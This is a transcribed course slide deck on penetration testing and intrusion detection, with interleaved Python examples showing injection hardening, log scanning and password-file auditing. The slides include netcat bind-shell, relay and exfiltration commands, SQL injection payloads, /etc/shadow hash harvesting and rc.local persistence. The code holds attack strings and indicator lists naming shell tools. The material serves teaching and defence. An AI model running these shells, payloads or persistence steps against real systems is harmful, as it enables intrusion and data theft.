penetration testing and intrusion detection system

Bikrant Gautam, Swarna Rekha Manchikatla, IA612/Fall-2015/SCSU

Uploaded by: bikrant-gautam

Posted on: 09-Jan-2017

Page 1

PENETRATION TESTING AND INTRUSION DETECTION SYSTEM

Page 2

TABLE OF CONTENTS

✘ Forms of Cyber Attacks
✘ Network Penetration
✘ Commercial Pen Testing Tools
✘ SQL Injection
✘ Enumeration and Hash Grabbing
✘ Password Cracking
✘ Privilege Escalation
✘ Final Malicious Phases
✘ Data Exfiltration
✘ Assignment
✘ Conclusion

Page 3

FORMS OF CYBER ATTACKS

Cyber attack techniques come in a variety of forms. A few are listed below:

✘ Buffer Overflows
✘ Command Injection Attacks
✘ SQL Injection Attacks

Page 4

BUFFER OVERFLOWS

✘ The buffer overflow technique writes attack code over data and program areas in the target machine's memory, causing that code to execute.
✘ Oversized input places the attack code into executable areas of the target machine.
✘ Example: a string of CPU no-operation instructions.

Page 5

BUFFER OVERFLOWS (Contd.)

Evidence:
✘ System logs
  OS logs - generate panic and error messages
  IDS logs - indicate buffer overflow alerts
✘ Network sensor logs

Page 6

BUFFER OVERFLOWS (Contd.)

Targets:
✘ Web browsers
  Render HTML and execute embedded scripts.
  Drive-by malware attacks the browser when the user visits a malicious page.
✘ Web applications
  Input injection attacks - commands, meta-characters, pathnames, SQL queries.
✘ Client-server and desktop applications
  Email attachments, direct internet interfaces.

Page 7

Command Injection Attacks

✘ Executes system commands by fooling a program into running the attacker's commands.
✘ Example: exec(<command line>), system(<command line>)
✘ Meta-character attacks are used in injection attacks to confuse or disrupt programs.
  Example: pathname injection, directory traversal attacks
✘ Command-line and meta-character attacks are inserted into web cookies for cookie poisoning.
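The two defects named on this slide, a program handing user input to a shell and a pathname that is not confined to its intended directory, are shown below as a vulnerable routine beside its hardened form. This is an added example, not code from the presentation: the file listing scenario, the `notes.txt; id` input and the meta-character list are constructed for the demonstration, and it assumes a POSIX shell with `ls` and `id` available.

```python
import os
import re
import subprocess
import tempfile

# Characters that let a shell chain, redirect or substitute commands
# (assumed list for this demo; tune to the shell actually in use).
SHELL_META = re.compile(r"[;&|`$<>(){}\n\r]")


def has_shell_metachars(value: str) -> bool:
    """True if the user-supplied value contains shell meta-characters."""
    return bool(SHELL_META.search(value))


def safe_join(base_dir: str, user_path: str) -> str:
    """Resolve user_path under base_dir and reject anything that escapes it.

    Both sides are canonicalised with realpath first, so '../' sequences,
    absolute paths and symlinks are all judged by where they really land.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return target


def list_file_vulnerable(base_dir: str, user_path: str) -> str:
    """Vulnerable: the command is built by string concatenation and parsed by
    a shell, so ';' or '|' in user_path starts a second command."""
    result = subprocess.run(
        "ls -l " + user_path, shell=True, cwd=base_dir,
        capture_output=True, text=True,
    )
    return result.stdout + result.stderr


def list_file_hardened(base_dir: str, user_path: str) -> str:
    """Hardened: reject meta-characters, confine the path, and pass argv as a
    list so no shell ever parses the user's text."""
    if has_shell_metachars(user_path):
        raise ValueError("rejected input with shell meta-characters")
    target = safe_join(base_dir, user_path)
    result = subprocess.run(
        ["ls", "-l", target], cwd=base_dir,
        capture_output=True, text=True,
    )
    return result.stdout + result.stderr


def demo() -> dict:
    """Run both routines against a constructed injection string and two
    traversal attempts; returns what each version did."""
    with tempfile.TemporaryDirectory() as d:
        open(os.path.join(d, "notes.txt"), "w").close()
        payload = "notes.txt; id"  # constructed: a filename followed by a second command
        vuln_output = list_file_vulnerable(d, payload)
        try:
            hardened = list_file_hardened(d, payload)
        except ValueError as err:
            hardened = f"refused: {err}"
        rejected = []
        for p in ("../../etc/passwd", "/etc/passwd"):
            try:
                safe_join(d, p)
                rejected.append(False)
            except ValueError:
                rejected.append(True)
        return {
            "injected": "uid=" in vuln_output,   # the second command ran
            "hardened_refused": hardened.startswith("refused"),
            "traversal_rejected": all(rejected),
            "legit_path_ok": safe_join(d, "notes.txt").endswith("notes.txt"),
        }


if __name__ == "__main__":
    print(demo())
```

The argv-list form is the real fix; the meta-character filter is defence in depth and a convenient detection point, since a rejected request is exactly the event worth writing to the application log.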

Page 8

SQL Injection Attacks

✘ Adds SQL commands to an input string using meta-characters.
✘ Exposes significant sensitive data and damages database integrity.
✘ Example: 'DROP TABLE tablename;'

Page 9

SQL Injection Attacks (Contd.)

✘ Web server logs - record input strings; they can be searched for meta-characters, system commands, pathnames, and SQL query statements.
✘ Injection attacks generate application errors in event logs, database logs, and application logs.
✘ IDS logs - alerts detecting injection attacks.
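The log search this slide describes, as an added example (not part of the presentation): a scanner that reads access-log lines, URL-decodes the request target, and flags the indicator classes named above. The log lines, the indicator regexes and the indicator names are constructed for this demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format style), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2015:10:01:02 -0600] "GET /faculty?id=F001 HTTP/1.1" 200 512
10.0.0.9 - - [12/Nov/2015:10:01:09 -0600] "GET /faculty?id=false%27+OR+%27true%27%3D%27true HTTP/1.1" 200 8192
10.0.0.9 - - [12/Nov/2015:10:01:15 -0600] "GET /faculty?id=1%3B+DROP+TABLE+Faculty%3B-- HTTP/1.1" 500 301
10.0.0.7 - - [12/Nov/2015:10:02:31 -0600] "GET /download?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 211
10.0.0.8 - - [12/Nov/2015:10:03:00 -0600] "GET /ping?host=10.0.0.1%3Bcat+%2Fetc%2Fshadow HTTP/1.1" 200 140
10.0.0.5 - - [12/Nov/2015:10:04:44 -0600] "GET /static/logo.png HTTP/1.1" 200 2048
"""

# Pulls method, request target and protocol out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)"')

# Indicator classes from the slide; the regexes are assumptions for this demo.
# '&' is deliberately not a meta-character here: it separates query parameters.
INDICATORS = [
    ("sql_tautology", re.compile(r"""['"]\s*(or|and)\s*['"(]""", re.I)),
    ("sql_keyword", re.compile(
        r"\b(union\s+select|drop\s+table|insert\s+into|delete\s+from|select\s+.+?\s+from)\b", re.I)),
    ("sql_comment", re.compile(r"--|/\*")),
    ("meta_chars", re.compile(r"[;|`$<>]")),
    ("path_traversal", re.compile(r"\.\.[/\\]")),
    ("sensitive_path", re.compile(r"/etc/(passwd|shadow)")),
    # a system command only counts when it follows a command separator
    ("system_command", re.compile(
        r"[;|`]\s*(cat|whoami|wget|curl|nc|bash|sh|cmd\.exe|powershell)\b", re.I)),
]


def scan_log(text: str, decode: bool = True) -> list:
    """Return one finding per suspicious line: {'line', 'target', 'hits'}.

    decode=True URL-decodes the request target before matching; with
    decode=False the scan sees only the encoded bytes, which is how a naive
    grep over the raw log would behave.
    """
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        if decode:
            target = unquote_plus(target)
        hits = [name for name, rx in INDICATORS if rx.search(target)]
        if hits:
            findings.append({"line": number, "target": target, "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["line"], finding["hits"], finding["target"])
```

Run with decode=False the scanner catches only the `--` on line 3; everything else is hidden behind `%27`, `%3B` and `%2F`, which is why decoding before matching is the step that makes this search useful.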

Page 10

NETWORK PENETRATION

✘ METASPLOIT
  ✘ Free tool for pen testing
  ✘ Has system exploits (code) that gain access to systems without credentials.
✘ User interfaces:
  ✘ GUI
  ✘ Command line
  ✘ Metasploit console

Page 11

NETWORK PENETRATION (Contd.)

Requirements for Metasploit pen testing:

✘ Knowledge about the target systems - OS, services, versions, and known vulnerabilities such as MITRE Common Vulnerabilities and Exposures (CVE) entries and MS Security Bulletins.
✘ Metasploit's exploit database is searchable by these attributes.

Page 12

NETWORK PENETRATION (Contd.)

Commands for conducting penetration:

Page 13

NETWORK PENETRATION (Contd.)

✘ The Metasploit Console example shown exploits MS06-040, a vulnerability in the Server service on Windows.
✘ A search for MS06-040 turns up exploits. You can select the exploit and display its information.
✘ The exploit code (for example, the module named ms06_040_netapi) breaks into the system using a known software defect.

Page 14

NETWORK PENETRATION (Contd.)

✘ Each exploit can have payloads, which are executed on the target system after exploitation (for example, the module named windows/meterpreter/bind_tcp).
✘ 'show options' is used to verify the settings.
✘ RHOST - sets the remote host.
✘ LHOST - sets the local host.
✘ In the example, the target is the OS.

Page 15

NETWORK PENETRATION (Contd.)

✘ The save command stores the current settings to a configuration file in the home directory: ~/.msf3/config.
✘ The check command attempts to verify that the target is exploitable.
✘ The exploit command launches the attack. It might succeed, giving you remote access, or it might return you to the console prompt.
✘ The rcheck and rexploit commands re-run the check and re-launch the exploit.

Page 16

NETWORK PENETRATION (Contd.)

✘ Use the sessions command with the list (-l) option to find the active connections. Join a connection and gain access via the interactive (-i) option and the session number.
✘ Usually, exploits give raw shell access, whereas the Meterpreter payload attaches a Dynamic Link Library (DLL) to the running service and returns the Meterpreter command shell.

Page 17

NETWORK PENETRATION (Contd.)

✘ The Meterpreter shell has many built-in commands for file system navigation, local and remote shell commands, uploading executables, and downloading files for exfiltration.
✘ The '?' command gives help information.
✘ The Metasploit command line (msfcli) provides an alternative way to use Metasploit.

Page 18

NETWORK PENETRATION (Contd.)

✘ The following commands return help information and a searchable listing of the Metasploit exploits:

# ./msfcli | less
# ./msfcli | grep -i "ms06_040"

Page 19

NETWORK PENETRATION (Contd.)

✘ Show options (O) - displays the parameters you can set and their defaults.
✘ Show payloads (P) - displays the available payloads.
✘ Pipe the results to grep (or less) to search for specific payloads.
✘ Show targets (T) - displays the operating system targets for the exploit.
✘ The exploit (E) command launches the attack.
✘ There is also a check (C) command (not shown) to test for the vulnerability.

Page 20

Commercial Pen Testing Tools

IMPACT: Basic usage of IMPACT Pro includes the steps below:

1. Open the application.
2. Click Get Updates to download the latest exploits.
3. Click New Workspace to create a pen test project.
4. Click the Network Information Gathering link to run network mapping and vulnerability probes.
5. Enter an IP address range and start the scan.

Page 21

Commercial Pen Testing Tools (Contd.)

6. Click the Network Attack and Penetration link to initiate automated attacks.
7. Click the Privilege Escalation link to obtain administrative access.
8. Click the Clean Up link to remove any remote code or other target system changes.
9. Click the Network Report Generation link to automatically create a report of all findings.

Page 22

Commercial Pen Testing Tools (Contd.)

CANVAS:
✘ CANVAS has numerous selectable tests on the module tab.
✘ The tests fall into categories such as recon, search, exploits, and commands.
✘ CANVAS sessions start with network mapping (the recon category), which includes OS detection (osdetect) and port scanning (portscan).
✘ As CANVAS maps the network, more and more information is accumulated for reporting.

Page 23

Using Netcat to Create Connections and Move Data and Binaries

✘ Netcat (nc) is a universal tool that runs on Windows, Linux, and Unix. It connects standard input/output to a network connection, TCP by default.
✘ TCP listener setup:
  Target # nc -l -p 80
✘ Remote connection to this listener on 10.10.100.10:
  Tester # nc 10.10.100.10 80
✘ Download a file from a target machine:
  Target # cat file.txt | nc -l -p 80
  Tester # nc -q0 10.10.100.10 80 | tee file.txt

Page 24

Using Netcat to Create Relays and Pivots

✘ Netcat commands can be chained together to create relays.

Example:
  Target (.30)  # nc -l -p 80 -e /bin/bash
  Relay setup   C:\> echo nc 10.10.100.30 80 > connect.bat
  Relay (.90)   C:\> nc -l -p 80 -e connect.bat
  Tester        # nc -10 10.10.100.90 80

Page 25

SQL Injection

SQL injection vulnerabilities arise when input from web forms is added to database queries without proper input validation.

Page 26

SQL Injection Methods

✘ Using tautologies, which always evaluate to true:
  SELECT * FROM Faculty WHERE Id='false' OR 'true'='true'
✘ Grouping by parentheses:
  false') OR ('true'='true
✘ Using an SQL comment:
  false' OR 'true'='true'; --
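The three payload shapes on this slide, run against an in-memory SQLite table so the effect of each is visible, beside the parameterised query that neutralises all of them. This is an added example, not code from the presentation: the Faculty rows, the three query templates and the helper names are constructed for the demo, and the comment payload drops the slide's `;` because Python's sqlite3 `execute()` accepts one statement per call (the `--` still discards everything after it).

```python
import sqlite3

# Constructed sample rows standing in for the slide's Faculty table.
ROWS = [("F001", "Ada", 1), ("F002", "Grace", 1), ("F003", "Linus", 0)]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Faculty (Id TEXT, Name TEXT, Active INTEGER)")
    conn.executemany("INSERT INTO Faculty VALUES (?, ?, ?)", ROWS)
    return conn


# Query templates that embed the user value by string substitution. Each
# payload on the slide is shaped for one of these: a bare quoted literal,
# a parenthesised literal, or a literal followed by a further condition.
PLAIN = "SELECT Id, Name FROM Faculty WHERE Id='{}'"
PARENS = "SELECT Id, Name FROM Faculty WHERE (Id='{}')"
TRAILING = "SELECT Id, Name FROM Faculty WHERE Id='{}' AND Active=1"

# Payloads in the slide's form (constructed for this demo).
TAUTOLOGY = "false' OR 'true'='true"
PARENS_PAYLOAD = "false') OR ('true'='true"
COMMENT_PAYLOAD = "false' OR 'true'='true' --"


def lookup_vulnerable(conn, template: str, user_value: str) -> list:
    """Vulnerable: the value is spliced into the SQL text, so a quote in it
    closes the literal and the rest is parsed as SQL."""
    return conn.execute(template.format(user_value)).fetchall()


def probe(conn, template: str, user_value: str):
    """Row count the vulnerable lookup returns, or 'syntax error' when the
    payload shape does not fit the template (a mismatched parenthesis)."""
    try:
        return len(lookup_vulnerable(conn, template, user_value))
    except sqlite3.OperationalError:
        return "syntax error"


def lookup_safe(conn, user_value: str, only_active: bool = False) -> list:
    """Hardened: the value is bound as a parameter and compared as data;
    quotes, OR and -- inside it never reach the SQL parser."""
    sql = "SELECT Id, Name FROM Faculty WHERE Id=?"
    if only_active:
        sql += " AND Active=1"
    return conn.execute(sql, (user_value,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("plain + tautology    :", probe(db, PLAIN, TAUTOLOGY))
    print("plain + parens       :", probe(db, PLAIN, PARENS_PAYLOAD))
    print("parens + parens      :", probe(db, PARENS, PARENS_PAYLOAD))
    print("trailing + tautology :", probe(db, TRAILING, TAUTOLOGY))
    print("trailing + comment   :", probe(db, TRAILING, COMMENT_PAYLOAD))
    print("safe + tautology     :", lookup_safe(db, TAUTOLOGY))
```

Two details worth noticing: the parenthesis payload is a syntax error against the plain template (which is why probing produces the application errors the previous slide says to look for in logs), and against the template with a trailing `AND Active=1` the bare tautology only returns the active rows, while the comment form returns all three because it removes the trailing condition.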

Page 27

Enumeration and Hash Grabbing

✘ Obtaining user credentials for access to systems plays a very significant role in pen testing.
✘ User names are available through different sources such as web pages, social networks, mail services, etc.
✘ BackTrack has a tool called harvester which can be used to collect user credentials from a web-based target.

Page 28

Enumeration (Contd.)

✘ The harvester searches services like SNMP and DNS to collect user information from a website.
✘ Enumeration and hash grabbing in Windows

Page 29

Enumeration and Hash Grabbing in Windows (Contd.)

✘ Use Meterpreter to extract SAM data.
✘ If the machine is physically accessible:
  ✘ Helix and CAINE can be used to access the Windows registry.
  ✘ FTK can be used to collect the information offline as well.

Page 30

Enumeration and Hash Grabbing in Linux

✘ Usernames are easily accessible through /etc/passwd, from which they can be harvested.
✘ Password hashes are stored in /etc/shadow, from which they can be harvested.
✘ The unshadow tool extracts Linux password hashes.
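Since these two files are exactly what an attacker with local access goes after, the defender's counterpart is an audit that parses them and reports what would make offline cracking cheap. This is an added example, not code from the presentation: the /etc/passwd and /etc/shadow content is constructed, the hash fields are labelled placeholders rather than real hashes, and the finding names are assumptions for this demo.

```python
# Constructed sample of /etc/passwd (user:x:uid:gid:gecos:home:shell).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
legacy:x:1002:1002:Legacy svc:/srv/legacy:/bin/sh
toor:x:0:0:backup root:/root:/bin/bash
"""

# Constructed sample of /etc/shadow (user:hash:lastchange:min:max:warn:inactive:expire:).
# The hash fields are placeholders, not real hashes.
SHADOW = """\
root:$6$saltsalt$<placeholder-sha512-hash>:16700:0:99999:7:::
daemon:*:16700:0:99999:7:::
alice:$y$j9T$<placeholder-yescrypt-hash>:16700:0:99999:7:::
bob:$1$abcdefgh$<placeholder-md5-hash>:15000:0:99999:7:::
legacy::16700:0:99999:7:::
toor:$6$saltsalt$<placeholder-sha512-hash>:16700:0:99999:7:::
"""

# crypt(3) hash prefixes and the algorithm each identifies.
ALGOS = {
    "$1$": "md5", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256", "$6$": "sha512", "$7$": "scrypt",
    "$y$": "yescrypt", "$gy$": "gost-yescrypt",
}
WEAK = {"md5", "des"}  # fast, unsalted-or-short-salt schemes; cheap to attack offline


def hash_algorithm(field: str) -> str:
    """Classify a shadow password field by its prefix."""
    if field == "":
        return "empty"          # no password needed at all
    if field.startswith(("*", "!")):
        return "locked"         # account cannot log in with a password
    for prefix, name in ALGOS.items():
        if field.startswith(prefix):
            return name
    if "$" not in field and len(field) == 13:
        return "des"            # traditional 2-char-salt DES crypt
    return "unknown"


def parse_colon_file(text: str) -> dict:
    """Map user name -> list of fields for passwd/shadow-style files."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        entries[fields[0]] = fields
    return entries


def audit(passwd_text: str, shadow_text: str) -> list:
    """Return sorted (user, finding) pairs for the conditions worth fixing
    before an attacker, rather than a cracker benchmark, finds them."""
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    findings = []
    for user, fields in passwd.items():
        if int(fields[2]) == 0 and user != "root":
            findings.append((user, "uid_0_not_root"))
        if fields[1] != "x":
            findings.append((user, "hash_in_passwd"))   # world-readable hash
        entry = shadow.get(user)
        if entry is None:
            findings.append((user, "missing_shadow_entry"))
            continue
        algo = hash_algorithm(entry[1])
        if algo == "empty":
            findings.append((user, "empty_password"))
        elif algo in WEAK:
            findings.append((user, f"weak_hash_algorithm:{algo}"))
        elif algo == "unknown":
            findings.append((user, "unrecognised_hash_format"))
    return sorted(findings)


if __name__ == "__main__":
    for user, finding in audit(PASSWD, SHADOW):
        print(f"{user:10} {finding}")
```

On a real host the two files are readable only as root (shadow) and by everyone (passwd); the audit deliberately never touches the hash values themselves, only their format, which is all that is needed to know how expensive an offline attack on them would be.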

Page 31

Password Cracking

✘ Online and offline methods
✘ Dictionary attack, brute-force attack, fuzzing, and specialized algorithms
✘ Gather information about passwords from password policies.
✘ Offline tools have the advantage that more passwords can be guessed in a fixed interval.

Page 32

Password Cracking (Contd.)

✘ John the Ripper
  ✘ Cracks virtually all passwords, including Linux salted hashes
✘ Rainbow tables
  ✘ Algorithm to crack complex passwords
  ✘ Matches pre-computed hashes
✘ Cain and Abel
  ✘ Cracks Windows, network device, and database passwords.

Page 33

Privilege Escalation

✘ Gain administrative access to target systems.
✘ Meterpreter can be used for privilege escalation.
✘ Password and hash crackers can also be used to gain privileged access to the system.

Page 34

Final Malicious Phases

✘ Providing evidence of compromise: reports, passwords, hashes, service files, etc.
✘ Exporting data: data exfiltration using a backdoor.

Page 35

Data Exfiltration (Contd.)

✘ Entrenchment
  ✘ Keeps backdoors enabled even after reboots.
  ✘ On Linux: edit /etc/rc.local and add the process so that it respawns.
  ✘ On Windows: add a shortcut to the batch file.

Page 36

Data Exfiltration (Contd.)

✘ Hidden files
  ✘ Renaming files with a leading (.) or (..) hides them in Linux.
  ✘ Tick the Hidden check box in the file properties dialog in Windows.
✘ Rootkits
  ✘ Permanently capture control of the system and conceal themselves from detection.

Page 37

Data Exfiltration (Contd.)

✘ Rootkit vectors
  ✘ Phishing and spear-phishing email
  ✘ Drive-by malware
  ✘ AutoPlay malware
✘ Rootkit infection
  ✘ User level: affects the user
  ✘ Kernel level: modifies system calls

Page 38

Conclusion

✘ There is an obvious need to address the new threats raised by cyber warfare.
✘ Pen testing helps to find the vulnerabilities in a computer, a network system, or a web application.
✘ Organizations should make penetration testing a mandatory phase in their business cycle.

Page 39

Assignment:

1) Which forms of cyber attacks would you use to test web applications and databases on the web? Why? How?

✘ Cross-Site Scripting (XSS), Inclusion Vulnerabilities: LFI and RFI, Brute Force.
✘ SQL Injection (SQLi), Insecure Direct Object References

Page 40

Assignment (Contd.):

2) List the steps in performing a penetration test using Metasploit. What tools would you use prior to Metasploit to improve your chances of successful penetration?

Page 41

Assignment (Contd.):

3) Backdoor Configuration

Page 42

Assignment (Contd.):

4) Creating a BackTrack account and hash cracking

Page 43

Assignment (Contd.):

5) Which of the final malicious phase activities might be useful on a pen test engagement? Why? Which other techniques are unlikely to be allowed by the Rules of Engagement in most enterprises on production (operational) networks?

✘ The backdoor final malicious phase activity is the most useful one on a pen testing engagement.
✘ The rootkit final malicious phase activity is unlikely to be allowed by the rules of engagement in most industries on production networks, as it permanently captures system control and conceals itself from detection.

Page 44